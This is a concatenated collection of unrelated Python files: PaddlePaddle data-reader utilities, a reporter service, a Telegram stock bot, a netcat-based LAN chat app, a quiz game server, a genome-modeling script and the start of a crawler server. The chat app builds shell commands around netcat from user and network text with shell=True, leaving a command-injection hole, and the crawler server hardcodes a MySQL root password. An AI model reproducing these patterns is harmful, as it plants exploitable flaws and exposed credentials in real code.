For example, if three input readers' outputs are as follows:
[0, 0, 0],
[10, 10, 10],
[20, 20, 20].
The chained reader will output:
[[0, 0, 0], [10, 10, 10], [20, 20, 20]].
Args:
readers(list): input data readers.
Returns:
callable: the new chained data reader.
Examples:
.. code-block:: python
import paddle
def reader_creator_3(start):
def reader():
for i in range(start, start + 3):
yield [i, i, i]
return reader
c = paddle.reader.chain(reader_creator_3(0), reader_creator_3(10), reader_creator_3(20))
for e in c():
print(e)
# Output:
# [0, 0, 0]
# [1, 1, 1]
# [2, 2, 2]
# [10, 10, 10]
# [11, 11, 11]
# [12, 12, 12]
# [20, 20, 20]
# [21, 21, 21]
# [22, 22, 22]
"""
def reader():
rs = []
for r in readers:
rs.append(r())
for e in itertools.chain(*rs):
yield e
return reader
class ComposeNotAligned(ValueError):
pass
def compose(*readers, **kwargs):
"""
Creates a data reader whose output is the combination of input readers.
If input readers output following data entries:
(1, 2) 3 (4, 5)
The composed reader will output:
(1, 2, 3, 4, 5)
Args:
readers (Reader|list of Reader): readers that will be composed together.
check_alignment(bool, optional): Indicates whether the input readers are checked for
alignment. If True, whether input readers are aligned
            correctly will be checked; otherwise alignment will not be checked and trailing outputs
will be discarded. Defaults to True.
Returns:
the new data reader (Reader).
Raises:
ComposeNotAligned: outputs of readers are not aligned. This will not raise if check_alignment is set to False.
Examples:
.. code-block:: python
import paddle.fluid as fluid
def reader_creator_10(dur):
def reader():
for i in range(10):
yield i
return reader
reader = fluid.io.compose(reader_creator_10(0), reader_creator_10(0))
"""
check_alignment = kwargs.pop('check_alignment', True)
def make_tuple(x):
if isinstance(x, tuple):
return x
else:
return (x, )
def reader():
rs = []
for r in readers:
rs.append(r())
if not check_alignment:
for outputs in zip(*rs):
yield sum(list(map(make_tuple, outputs)), ())
else:
for outputs in zip_longest(*rs):
for o in outputs:
if o is None:
                    # None will not be present if compose is aligned
raise ComposeNotAligned(
"outputs of readers are not aligned.")
yield sum(list(map(make_tuple, outputs)), ())
return reader
def buffered(reader, size):
"""
Creates a buffered data reader.
The buffered data reader will read and save data entries into a
buffer. Reading from the buffered data reader will proceed as long
as the buffer is not empty.
:param reader: the data reader to read from.
:type reader: callable
:param size: max buffer size.
:type size: int
:returns: the buffered data reader.
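    Example:
        A minimal usage sketch (assuming this module is exposed as
        ``paddle.reader``):
        .. code-block:: python
            import paddle.reader
            def reader():
                for i in range(100):
                    yield i
            buffered_reader = paddle.reader.buffered(reader, 10)
            for e in buffered_reader():
                print(e)
            # yields 0..99; items are pre-fetched by a background thread into a buffer of size 10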
"""
class EndSignal():
pass
end = EndSignal()
def read_worker(r, q):
for d in r:
q.put(d)
q.put(end)
def data_reader():
r = reader()
q = Queue(maxsize=size)
t = Thread(
target=read_worker, args=(
r,
q, ))
t.daemon = True
t.start()
e = q.get()
while e != end:
yield e
e = q.get()
return data_reader
def firstn(reader, n):
"""
paddle.fluid.io.firstn ( :ref:`api_fluid_io_firstn` ) is recommended to use,
and paddle.reader.firstn is an alias.
This API creates a decorated reader, and limits the max number of
samples that reader could return.
Args:
reader(callable): the input reader.
n(int): the max number of samples in the reader.
Returns:
callable: the decorated reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
def reader():
for i in range(100):
yield i
firstn_reader = fluid.io.firstn(reader, 5)
for e in firstn_reader():
print(e)
# the outputs are: 0 1 2 3 4
"""
    # TODO(yuyang18): Check whether simply dropping the reader would clean up the opened
    # resource or not.
def firstn_reader():
for i, item in enumerate(reader()):
if i == n:
break
yield item
return firstn_reader
class XmapEndSignal():
pass
def xmap_readers(mapper, reader, process_num, buffer_size, order=False):
"""
    Use multiple threads to map samples from the reader with a user-defined mapper.
Args:
mapper (callable): a function to map the data from reader.
reader (callable): a data reader which yields the data.
        process_num (int): number of threads used to handle the samples.
buffer_size (int): size of the queue to read data in.
order (bool): whether to keep the data order from original reader.
Default False.
Returns:
callable: a decorated reader with data mapping.
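    Examples:
        A minimal usage sketch (assuming this module is exposed as
        ``paddle.reader``):
        .. code-block:: python
            import paddle.reader
            def mapper(x):
                return x + 1
            def reader():
                for i in range(5):
                    yield i
            xmap_reader = paddle.reader.xmap_readers(mapper, reader, 2, 8, order=True)
            for e in xmap_reader():
                print(e)
            # the outputs are: 1 2 3 4 5 (order kept because order=True)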
"""
end = XmapEndSignal()
# define a worker to read samples from reader to in_queue
def read_worker(reader, in_queue):
for i in reader():
in_queue.put(i)
in_queue.put(end)
# define a worker to read samples from reader to in_queue with order flag
def order_read_worker(reader, in_queue):
in_order = 0
for i in reader():
in_queue.put((in_order, i))
in_order += 1
in_queue.put(end)
# define a worker to handle samples from in_queue by mapper
# and put mapped samples into out_queue
def handle_worker(in_queue, out_queue, mapper):
sample = in_queue.get()
while not isinstance(sample, XmapEndSignal):
r = mapper(sample)
out_queue.put(r)
sample = in_queue.get()
in_queue.put(end)
out_queue.put(end)
# define a worker to handle samples from in_queue by mapper
# and put mapped samples into out_queue by order
def order_handle_worker(in_queue, out_queue, mapper, out_order):
ins = in_queue.get()
while not isinstance(ins, XmapEndSignal):
order, sample = ins
r = mapper(sample)
while order != out_order[0]:
pass
out_queue.put(r)
out_order[0] += 1
ins = in_queue.get()
in_queue.put(end)
out_queue.put(end)
def xreader():
in_queue = Queue(buffer_size)
out_queue = Queue(buffer_size)
out_order = [0]
# start a read worker in a thread
target = order_read_worker if order else read_worker
t = Thread(target=target, args=(reader, in_queue))
t.daemon = True
t.start()
# start several handle_workers
target = order_handle_worker if order else handle_worker
args = (in_queue, out_queue, mapper, out_order) if order else (
in_queue, out_queue, mapper)
workers = []
for i in range(process_num):
worker = Thread(target=target, args=args)
worker.daemon = True
workers.append(worker)
for w in workers:
w.start()
sample = out_queue.get()
while not isinstance(sample, XmapEndSignal):
yield sample
sample = out_queue.get()
finish = 1
while finish < process_num:
sample = out_queue.get()
if isinstance(sample, XmapEndSignal):
finish += 1
else:
yield sample
return xreader
def multiprocess_reader(readers, use_pipe=True, queue_size=1000):
"""
    This API uses python ``multiprocessing`` to read data from ``readers`` in parallel,
    and then ``multiprocessing.Queue`` or ``multiprocessing.Pipe`` is used to merge
    the data. A separate process is created for each reader in the
    ``readers`` list; please make sure every reader can work independently
    to avoid conflicts in a parallel environment.
    ``multiprocessing.Queue`` requires read/write access to /dev/shm, and it is not supported
    on some platforms.
Parameters:
readers (list( ``generator`` ) | tuple( ``generator`` )): a python ``generator`` list
used to read input data
        use_pipe (bool, optional): control the inner API used to implement the multi-processing,
            default True - use ``multiprocessing.Pipe``, which is recommended
        queue_size (int, optional): only useful when ``use_pipe`` is False - ``multiprocessing.Queue``
            is used, default 1000. Increasing this value can speed up data reading, at the cost of
            higher memory consumption.
Returns:
        ``generator``: a new reader which can be run in parallel
Example:
.. code-block:: python
import paddle.fluid as fluid
from paddle.fluid.io import multiprocess_reader
import numpy as np
sample_files = ['sample_file_1', 'sample_file_2']
def fake_input_files():
with open(sample_files[0], 'w') as f:
np.savez(f, a=np.array([1, 2]), b=np.array([3, 4]), c=np.array([5, 6]), d=np.array([7, 8]))
with open(sample_files[1], 'w') as f:
np.savez(f, a=np.array([9, 10]), b=np.array([11, 12]), c=np.array([13, 14]))
def generate_reader(file_name):
# load data file
def _impl():
data = np.load(file_name)
for item in sorted(data.files):
yield data[item],
return _impl
if __name__ == '__main__':
# generate sample input files
fake_input_files()
with fluid.program_guard(fluid.Program(), fluid.Program()):
place = fluid.CPUPlace()
# the 1st 2 is batch size
image = fluid.data(name='image', dtype='int64', shape=[2, 1, 2])
fluid.layers.Print(image)
# print detailed tensor info of image variable
reader = fluid.io.PyReader(feed_list=[image], capacity=2)
decorated_reader = multiprocess_reader(
[generate_reader(sample_files[0]), generate_reader(sample_files[1])], False)
reader.decorate_sample_generator(decorated_reader, batch_size=2, places=[place])
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for data in reader():
res = exe.run(feed=data, fetch_list=[image])
print(res[0])
# print below content in this case
# [[[1 2]], [[3 4]]]
# [[[5 6]], [[7 8]]]
# [[[9 10]], [[11 12]]]
# [13,14] will be dropped
"""
try:
import ujson as json
except Exception as e:
sys.stderr.write("import ujson error: " + str(e) + " use json\n")
import json
assert type(readers) is list and len(readers) > 0
def _read_into_queue(reader, queue):
try:
for sample in reader():
if sample is None:
raise ValueError("sample has None")
queue.put(sample)
queue.put(None)
except:
queue.put("")
six.reraise(*sys.exc_info())
def queue_reader():
queue = multiprocessing.Queue(queue_size)
for reader in readers:
p = multiprocessing.Process(
target=_read_into_queue, args=(reader, queue))
p.start()
reader_num = len(readers)
finish_num = 0
while finish_num < reader_num:
sample = queue.get()
if sample is None:
finish_num += 1
elif sample == "":
raise ValueError("multiprocess reader raises an exception")
else:
yield sample
def _read_into_pipe(reader, conn):
try:
for sample in reader():
if sample is None:
raise ValueError("sample has None!")
conn.send(json.dumps(sample))
conn.send(json.dumps(None))
conn.close()
except:
conn.send(json.dumps(""))
conn.close()
six.reraise(*sys.exc_info())
def pipe_reader():
conns = []
for reader in readers:
parent_conn, child_conn = multiprocessing.Pipe()
conns.append(parent_conn)
p = multiprocessing.Process(
target=_read_into_pipe, args=(reader, child_conn))
p.start()
reader_num = len(readers)
finish_num = 0
conn_to_remove = []
while finish_num < reader_num:
for conn in conn_to_remove:
conns.remove(conn)
conn_to_remove = []
for conn in conns:
sample = json.loads(conn.recv())
if sample is None:
finish_num += 1
conn.close()
conn_to_remove.append(conn)
elif sample == "":
conn.close()
conn_to_remove.append(conn)
raise ValueError("multiprocess reader raises an exception")
else:
yield sample
if use_pipe:
return pipe_reader
else:
return queue_reader
|
reporter.py | import logging
import signal
import threading
from context import get_context
from message_constants import MessageTypes, Topics
import parse_params as pp
from plugins import get_plugin, PluginType
from pubsub_client import make_sub_client
from remote_logging import configure_logging
from serialization import read_report_message, read_control_message
from zmq_extras import sub_polling_loop_handlers
logger = logging.getLogger("Reporter")
HELP_STRING = "Reporter process"
def start_reporter_thread():
t = threading.Thread(target=reporter,)
t.start()
return t
def load_plugins(context):
report_writer = get_plugin(
PluginType.report_store, key=context.get("report_storage_provider"),
)
if not report_writer:
logger.error(
"Report storage provider plugin %s not found. Quitting",
context.get("report_storage_provider"),
)
return False, None
return True, report_writer
def reporter():
logger.info("Starting reporter")
context = get_context()
ignore_kill = context.get("ignore_kill", False)
success, report_writer = load_plugins(context)
if not success:
return
writer = report_writer()
def on_message(_, message):
m_data, msg = read_report_message(message)
logger.info("Reporter message received")
logger.debug("m_data %s", m_data)
writer({**context, **m_data}, msg)
return False
def on_control_message(_, msg):
message = read_control_message(msg)
if message in (
MessageTypes.kill,
MessageTypes.all_kill,
MessageTypes.reporter_kill,
MessageTypes.global_kill,
):
logger.info("Reporter received quit message")
if not ignore_kill:
return True
logger.info("Ignoring kill message")
return False
logger.debug("Unknown control message received %s", message)
return False
try:
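        # the block below subscribes to the 'lreport' channel and dispatches messages by
        # topic: kill-type control messages signal the polling loop to stop (unless
        # ignore_kill is set), while learning reports are written via the storage plugin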
sub_client = make_sub_client(["lreport"])
handlers = {
Topics.control: on_control_message,
Topics.learning_reports: on_message,
}
sub_polling_loop_handlers(sub_client, handlers)
finally:
sub_client.close()
    logger.info("Reporting finished")
def build_args():
parser = pp.create_parser(HELP_STRING)
pp.add_remote_log(parser)
pp.add_report_storage_provider(parser)
pp.add_report_dir(parser)
pp.add_sub_address(parser)
pp.add_ignorekill(parser)
args = pp.get_args(parser)
pp.bind_args_to_context(args)
return args
def main():
signal.signal(signal.SIGINT, signal.SIG_DFL)
args = build_args()
configure_logging(args.remote_log)
reporter()
if __name__ == "__main__":
main()
|
main.py | import sys
import telegram
import time
from multiprocessing import Process, Value, Array
from PyQt5.QtWidgets import *
from KK1StockSupportBot import KK1StockSupportBot
from KK1StockAPI import KK1StockAPI
def callback_help_command(update: telegram.Update, context):
reply_text = str()
reply_text += "☆ 현재 명령어는 다음과 같이 구현되어 있습니다.\n"
reply_text += "└ /help: 명령어 리스트를 출력한다.\n"
# event_handler = 'help'
update.message.reply_text(reply_text)
def run_stock_api(token: str, event_handler: Value):
app = QApplication(sys.argv)
stock_api = KK1StockAPI(token)
stock_api.show()
    # app.exec_()  # Not needed since Qt UI events are not used here.
count = 1
while True:
time.sleep(0.5)
# stock_api.sendMessage("Test message " + str(count))
# count += 1
# if event_handler:
# print(event_handler)
# event_handler = None
def run_telegram_bot(token: str, event_handler: Value):
telegram_bot = KK1StockSupportBot(token)
telegram_bot.add_command_handler('help', callback_help_command)
telegram_bot.run()
def run_kk1_stock_supporter():
with open("D:/Projects/KK1StockSupporter/KK1StockSupport_bot.token") as file:
my_token = file.readline()
    # Use a shared resource (Value) as an event handler.
    # The updater receives incoming commands and passes them to the stock API through event_handler.
    # The stock API executes the received command and sends the result back.
    # The stock API also continuously checks the market and sends a message when specific conditions are met.
event_handler = Value('i', 0)
stock_api_process = Process(target=run_stock_api, args=(my_token, event_handler))
telegram_updater_process = Process(target=run_telegram_bot, args=(my_token, event_handler))
stock_api_process.start()
telegram_updater_process.start()
stock_api_process.join()
telegram_updater_process.join()
if __name__ == '__main__':
run_kk1_stock_supporter()
|
app.py | import threading
import os
import subprocess
import json
import sys
import re
import time
import netifaces
port = 12345
def my_server(local_ip,response_json):
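    # Listens on the configured port with 'nc -l' and handles incoming JSON messages:
    # DISCOVER -> record the sender and reply with a RESPOND message,
    # RESPOND  -> record the sender,
    # any other type is treated as a chat MESSAGE and written to the log.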
while(True):
try:
cmd = 'nc -l -p {}'.format(port)
process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True,
encoding='utf-8',
errors='replace'
)
out = process.stdout.readline()
start=out.find('{')
end=out.find('}')+1
msg=out[start:end]
rejson = json.loads(msg)
print("the json loaded is :",rejson,flush=True)
if rejson["TYPE"] == "DISCOVER":
response_msg = {
"MY_IP":"",
"NAME":"",
"TYPE":"RESPOND",
"PAYLOAD":""
}
is_writable = True
responses = response_json["response_array"]
for response in responses:
if response["ip"] == rejson["MY_IP"]:
is_writable = False
if is_writable:
response_json["response_array"].append({"user_name":rejson["NAME"],"ip":rejson["MY_IP"]})
with open("response_json.json", "w") as outfile:
outfile.write(json.dumps(response_json))
response_msg["MY_IP"]=local_ip
response_msg["NAME"] = "ismet"
client(json.dumps(response_msg),rejson["MY_IP"])
log_file = open("log.txt","a")
log_file.write("you got a DISCOVER message from "+rejson["MY_IP"]+" so send a RESPOND message \n")
log_file.close()
elif rejson["TYPE"] == "RESPOND":
is_writable = True
responses = response_json["response_array"]
for response in responses:
if response["ip"] == rejson["MY_IP"]:
is_writable = False
if is_writable:
response_json["response_array"].append({"user_name":rejson["NAME"],"ip":rejson["MY_IP"]})
with open("response_json.json", "w") as outfile:
outfile.write(json.dumps(response_json))
log_file = open("log.txt","a")
log_file.write("you got a RESPOND message from "+rejson["MY_IP"]+"\n")
log_file.close()
else:
log_file = open("log.txt","a")
log_file.write("you got a MESSAGE message from "+rejson["MY_IP"]+" which is "+rejson["PAYLOAD"]+"\n")
log_file.close()
os.system("clear")
print("msg is ",msg,flush=True)
print("Whay do yo want to do \n Press m to send message\n Press d to send spesific discovery to an ip address\n",flush=True)
sys.stdout.flush()
except Exception as e:
print("There is an error \n",e,flush=True)
def client(message,to):
try:
command = "echo '{}' | nc {} {} -c".format(message,to,port)
print("sending the message with the command ",command,flush=True)
subprocess.call(command, shell=True)
except:
pass
def get_local_ips(is_hamachi):
local_ip = ""
if is_hamachi:
for i in netifaces.interfaces():
for l in netifaces.ifaddresses(i).get(netifaces.AF_INET, ()):
if l['addr'].startswith('25.'):
local_ip = l['addr']
else:
local_ip = subprocess.getoutput("ipconfig getifaddr en0")
parse=local_ip.split(".")
lan=str(parse[0])+"."+str(parse[1])+"."+str(parse[2])
return (local_ip,lan)
def send_discovery(local_ip,lan):
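    # Broadcast a DISCOVER message to every other address in the local /24 range via netcat.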
data={"MY_IP":"",
"NAME":"ismet",
"TYPE":"DISCOVER",
"PAYLOAD":""}
data["MY_IP"]=local_ip
for last_number in range(0,256):
temp_ip = lan+"."+str(last_number)
if temp_ip != local_ip:
log_file = open("log.txt","a")
log_file.write("you send a DISCOVER message to "+temp_ip+"\n")
log_file.close()
msg = json.dumps(data)
try:
cmd = "echo '{}' | nc {} {}".format(msg,temp_ip,port)
subprocess.Popen(cmd, shell=True)
except:
pass
sys.stdout.flush()
def input_process(my_ip):
os.system("clear")
while(True):
request = input("Whay do yo want to do \n Press m to send message\n Press d to send spesific discovery to an ip address\n")
if request == "m":
            print('Write your message\n',flush=True)
your_message=input()
os.system("clear")
json_data={"MY_IP":"",
"NAME":"ismet",
"TYPE":"MESSAGE",
"PAYLOAD":""}
json_data["MY_IP"] = my_ip
json_data["PAYLOAD"] = your_message
msg=json.dumps(json_data)
            print('Which user do you want to send this message to\n',flush=True)
responses = response_json["response_array"]
index = 1
for response in responses:
print(index,".",response["user_name"],"\n",flush=True)
index = index + 1
user_order=int(input("give order\n"))
ip_to_send = response_json["response_array"][user_order-1]["ip"]
client(msg,ip_to_send)
log_file = open("log.txt","a")
log_file.write("you send a MESSAGE message to "+ip_to_send+"\n")
log_file.close()
elif request == "d":
print('Write the ip address',flush=True)
ip_to_send=input()
os.system("clear")
json_data={"MY_IP":"",
"NAME":"ismet",
"TYPE":"DISCOVER",
"PAYLOAD":""}
json_data["MY_IP"] = my_ip
msg=json.dumps(json_data)
client(msg,ip_to_send)
log_file = open("log.txt","a")
log_file.write("you send a DISCOVER message to "+ip_to_send+"\n")
log_file.close()
else:
input_process(my_ip)
if __name__ == "__main__":
response_json={}
with open("response_json.json", "r") as outfile:
response_json = json.load(outfile)
hamachi = False
try:
if sys.argv[1] == "h":
hamachi = True
except:
pass
t=get_local_ips(hamachi)
server = threading.Thread(target=my_server,args=(t[0],response_json,))
server.start()
time.sleep(2)
discovery_thread = threading.Thread(target=send_discovery,args=(t[0],t[1],))
discovery_thread.start()
discovery_thread.join()
input_process(my_ip=t[0])
|
Server.py | import socket
import time
import struct
from random import randint
from threading import Thread
import os
from scapy.arch import get_if_addr
os.system("")
# Colors for prints
class Colors:
GREEN = '\033[32m'
BLUE = '\033[34m'
PINK = '\033[35m'
UDP_DEST_IP = '<broadcast>'
UDP_DEST_PORT = 13117
TCP_DEST_PORT = 2006
MESSAGE_LENGTH = 1024
TIME_UNTIL_GAME = 10 # seconds
TIME_TO_PLAY = 10 # seconds
sockUDP = None
sockTCP = None
CONN_A = None
CONN_B = None
counter = 0
def start_udp():
global sockUDP
ip = get_if_addr("eth1")
sockUDP = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) # UDP
sockUDP.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sockUDP.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
return ip
def send_broadcast():
global sockUDP
ip = start_udp()
print(Colors.GREEN + "Server started, listening on IP address " + ip)
while counter < 2:
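        # offer packet: magic cookie 0xabcddcba, message type 0x2 (offer) and the
        # TCP port clients should connect to, packed with struct format 'IBH'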
buffer = struct.pack('IBH', 0xabcddcba, 0x2, TCP_DEST_PORT)
sockUDP.sendto(buffer, (UDP_DEST_IP, UDP_DEST_PORT))
        time.sleep(1)  # don't overload
def connect_clients():
global counter, sockTCP, CONN_B, CONN_A # can use address later
while True:
if counter < 2:
try:
conn, address = sockTCP.accept()
if counter == 0:
CONN_A = conn
CONN_A.setblocking(0)
else:
CONN_B = conn
CONN_B.setblocking(0)
counter += 1
except Exception as e:
pass
else:
print(Colors.BLUE + "game starts in 10 secs")
break
def get_group_names():
try:
name_a = CONN_A.recv(MESSAGE_LENGTH).decode()
name_b = CONN_B.recv(MESSAGE_LENGTH).decode()
return name_a, name_b, True
except Exception as e:
print(Colors.GREEN + "group name was not entered so couldn't start the game")
send_message("group name was not entered so couldn't start the game")
return "", "", False
def send_message(message):
try:
CONN_A.sendall(message.encode())
CONN_B.sendall(message.encode())
except Exception as e:
pass
def receive_char(answer):
global CONN_A, CONN_B
a_won = False
got_answer = False
timeout = time.time() + TIME_TO_PLAY
while time.time() < timeout and not got_answer:
try:
data = CONN_A.recv(1024)
if int(data) == answer:
a_won = True
else:
a_won = False
got_answer = True
return a_won, got_answer
except Exception as e:
try:
data = CONN_B.recv(1024)
if int(data) == answer:
a_won = False
else:
a_won = True
got_answer = True
return a_won, got_answer
except Exception as e:
time.sleep(0.1)
return a_won, got_answer
def send_end_message(name_a, name_b, answer, a_won, got_answer):
if a_won:
winner_group = name_a
else:
winner_group = name_b
if got_answer:
end_message = "Game over!\nThe correct answer was " + str(
answer) + "!\nCongratulations to the winner:" + winner_group
else:
end_message = "Game over!\nNo one answered - Draw"
print(Colors.PINK + end_message)
send_message(end_message)
def send_math_question():
try:
math = ["2+3", "4-2", "9-3", "2*4", "1*5", "6/3", "8/4", "ln(e^3)"]
answerTable = [5, 2, 6, 8, 5, 2, 2, 3]
value = randint(0, 7)
send_message("How much is: " + math[value] + "?\n")
return answerTable[value]
except Exception as e:
pass
def start_game():
try:
time.sleep(TIME_UNTIL_GAME)
# part 1 - only thing that can stop a game, get group names
name_a, name_b, isValid = get_group_names()
if isValid:
            # part 2 - send the opening message and a random math question
begin_message = "Welcome to Quick Maths.\nPlayer 1: " + name_a + "\nPlayer 2: " + name_b + "\n====\n Please " \
"answer the " \
"following " \
"question as fast " \
"as you can:\n "
send_message(begin_message)
answer = send_math_question()
# part 3 - receive answer
a_won, got_answer = receive_char(answer)
# part 4 - declare the winner
send_end_message(name_a, name_b, answer, a_won, got_answer)
except Exception as e:
pass
def start_tcp():
global sockTCP
sockTCP = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # init the TCP socket
sockTCP.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sockTCP.bind(('', TCP_DEST_PORT))
sockTCP.listen(2)
def reset_params():
global counter
counter = 0
def main():
global counter
start_tcp()
while True:
try:
time.sleep(1) # not a must, but make sure clients can disconnect
# part 1 - broadcast
broadcaster = Thread(target=send_broadcast, args=())
# part 2 - wait for 2 clients to connect, wait indefinitely
client_connector = Thread(target=connect_clients, args=())
broadcaster.start()
client_connector.start()
# part 3 - make sure they finish before game starts
broadcaster.join()
client_connector.join()
# part 4 - play the game
start_game()
# part 5 - game ended, start anew
reset_params()
CONN_A.close()
CONN_B.close()
except Exception as e:
pass
print("Game over, sending out offer requests...")
if __name__ == "__main__":
main()
|
Astep_locus.py | #!/usr/bin/env python
##
# Copyright (C) 2016 University of Southern California and
# Nan Hua
#
# Authors: Nan Hua, Ke Gong, Harianto Tjong, and Hanjun Shin
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#Assignment step for locus (non-haploid); Added by Harianto; June 2017
import re
import sys
import numpy as np
import alab.matrix
import alab.modeling
import multiprocessing
import os
import argparse
import json
__author__ = "Nan Hua"
__credits__ = ["Nan Hua","Ke Gong","Harianto Tjong", "Hanjun Shin"]
__license__ = "GPL"
__version__ = "0.0.1"
__email__ = "nhua@usc.edu"
#===========define functions
def readinCoordinates(copystart,copyend,lastfb,coor_shared,structdir,nstruct,nbead):
arr = np.frombuffer(coor_shared.get_obj())
modelcoor = arr.reshape((nstruct,nbead,3)) #e.g. 10000 * nbead* 3
for i in range(copystart,copyend):
try:
xyz,r = alab.modeling.readCoordinates(structdir+'/copy'+str(i)+'.hms',lastfb)
modelcoor[i][:] = xyz
except RuntimeError:
print "Can't find result for copy %s , %s" %(str(i),lastfb)
#--
def existingPortion(v, rsum):
return sum(v<=rsum)*1.0/len(v)
def cleanProbability(pij,pexist):
if pexist < 1:
pclean = (pij-pexist)/(1.0-pexist)
else:
pclean = pij
return max(0,pclean)
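# For each bead pair (i, j), the activation distance is taken as the p-quantile of the
# current surface-to-surface distances across all structures, where p is the target
# contact probability corrected for contacts already satisfied (pnow) and for the
# probability enforced in the previous iteration (plast).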
def calcActdist(jobqueue,fid,coor_shared,queue,probmat,nstruct,nbead,lastprob, r):
arr = np.frombuffer(coor_shared.get_obj())
modelcoor = arr.reshape((nstruct,nbead,3)) #10000 * nbead* 3
for job in jobqueue:
i = job[0]
j = job[1]
pwish = probmat.matrix[i,j]
plast = lastprob[i,j]
dists = np.linalg.norm(modelcoor[:,i,:] - modelcoor[:,j,:],axis=1) -r[i] - r[j] #L2 norm
sortdist = np.sort(dists)
pnow = existingPortion(sortdist,r[i]+r[j])
t = cleanProbability(pnow,plast)
p = cleanProbability(pwish,t)
if p>0:
o = min(nstruct-1, int(round(p*nstruct)))
res = '%4d %4d %5.3f %7.1f %5.3f %5.3f\n'%(i,j,pwish,sortdist[o],p,pnow)
queue.put(res)
return 0
def listener(queue,actFile):
fout=open(actFile,'w')
while True:
res = queue.get()
if res == 'kill':
break
fout.write(str(res))
fout.flush()
fout.close()
#===========end
#===================main entry========================
#def main(probfile,structdir,actFile,lastfb,currentfb,nstruct,pids,plastfile):
def main(input_config):
    if 'modeling_parameters' not in input_config:
        raise Exception('%s : Input config error, it does not have modeling_parameters' % os.path.basename(__file__))
    required_keys = ('probMat', 'struct_dir', 'actDist', 'last_theta', 'theta',
                     'num_of_structures', 'last_actDist', 'pids')
    for key in required_keys:
        if key not in input_config['modeling_parameters']:
            raise Exception('%s : Input config error, it does not have %s' % (os.path.basename(__file__), key))
probfile = str( input_config['modeling_parameters']['probMat'] )
structdir = str( input_config['modeling_parameters']['struct_dir'] )
actFile = str( input_config['modeling_parameters']['actDist'] )
lastfb = str( input_config['modeling_parameters']['last_theta'] )
currentfb = str( input_config['modeling_parameters']['theta'] )
nstruct = int( input_config['modeling_parameters']['num_of_structures'] )
pids = int( input_config['modeling_parameters']['pids'] )
plastfile = input_config['modeling_parameters']['last_actDist']
#################################
# parse arguments #
#################################
probmat = alab.matrix.contactmatrix(probfile)
nbead = len(probmat)
#targetfreq = float(re.search('\d+',currentfb).group(0))/100.
getnum = re.compile(r'[^\d.]+')
#targetfreq = float(getnum.sub('',currentfb))/100.
targetfreq = float(getnum.sub('',currentfb))
#################################
#read in structure conformation #
#################################
xyz,r = alab.modeling.readCoordinates(structdir+'/copy0.hms',lastfb)#tempread one file
coor_shared = multiprocessing.Array('d',nstruct*nbead*3) #10000 * nbead* 3
pid = 20
readpool = []
for k in range(pid):
start = k*(nstruct/pid)
end = (k+1)*(nstruct/pid)
process = multiprocessing.Process(target=readinCoordinates,args=(start,end,lastfb,coor_shared,structdir,nstruct,nbead))
process.start()
readpool.append(process)
for process in readpool:
process.join()
###############################
#read in last probability file#
###############################
lastprob = np.zeros((nbead,nbead))
if not (plastfile == None or plastfile == 'null'):
plastfile = str(plastfile)
lastinfo = np.genfromtxt(plastfile)
for i in range(len(lastinfo)):
lastprob[int(lastinfo[i,0]),int(lastinfo[i,1])] = lastinfo[i,4]
#-
#--
###############################
#calculate activation distance#
###############################
jobqueue = []
for i in range(pids):
jobqueue.append([])
q = 0
for i in range(nbead):
for j in range(i+1,nbead):
if probmat.matrix[i,j] >= targetfreq:
jobqueue[q].append((i,j))
q+= 1
if q >= pids:
q = 0
#-
# skip those low frequency entries
#--
#--
record = []
manager = multiprocessing.Manager()
q = manager.Queue()
watcher = multiprocessing.Process(target=listener,args=(q,actFile))
watcher.start()
for i in range(pids):
process = multiprocessing.Process(target = calcActdist,args=(jobqueue[i],i,coor_shared,q,probmat,nstruct,nbead, lastprob,r))
process.start()
record.append(process)
for process in record:
process.join()
q.put('kill')
watcher.join()
return 0
#=======================/main entry/===================
if __name__ == "__main__":
# parser.add_argument('--probfile', type=str, required=True) #probility matrix file in contactmatrix format <input>
# parser.add_argument('--structdir', type=str, required=True) #xxx/structures/model*/ <input>
# parser.add_argument('--actFile', type=str, required=True) #activation distance file, <output>
# parser.add_argument('--lastfb', type=str, required=True) #last theta <parameter>
# parser.add_argument('--currentfb', type=str, required=True) #current theta <parameter>
# parser.add_argument('--nstruct', type=int, required=True) #number of structures <parameter>
# parser.add_argument('--pids', type=int, required=False, default=8) #number of processers to use <setup>
# parser.add_argument('--plastfile', type=str, required=False, default=None)#last activation distance file <optional input>
#main(args.probfile, args.structdir, args.actFile, args.lastfb, args.currentfb, args.nstruct, int(args.pids), args.plastfile)
#parser = argparse.ArgumentParser(description="AStep.py")
#parser.add_argument('--input_config', type=str, required=True)
#args = parser.parse_args()
#main(args.input_config)
data = json.loads( sys.argv[1] )
main(data)
|
server.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import threading
import SocketServer
import re
import json
import signal
import random
import pymysql
import mysql.connector
import MySQLdb
import urllib2
from crawler import Crawler
from pymongo import MongoClient
from time import sleep
from kazoo.client import KazooClient
import os
# reload sys in order to deal with char set
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# start ZooKeeper Cluster
hosts_list = ['123.206.89.123:2181', '123.207.157.135:2181', '118.89.234.46:2181']
zk = KazooClient(hosts = hosts_list)
zk.start()
# try to use many kinds of MySQL Client to kill the fu*king BUG
#db2 = pymysql.connect(host="localhost",user="root",passwd="765885195",db="HP",charset="utf8")
#db2 = mysql.connector.connect(user="root", passwd="765885195", database="HP", use_unicode=True)
#db2 = MySQLdb.connect("localhost", "root", "765885195", "HP")
db1 = MySQLdb.connect(host="localhost",user="root",passwd="765885195",db="HP",charset="utf8")
db2 = MySQLdb.connect(host="localhost",user="root",passwd="765885195",db="HP",charset="utf8")
instant_data = ["35"]
# Supported website information
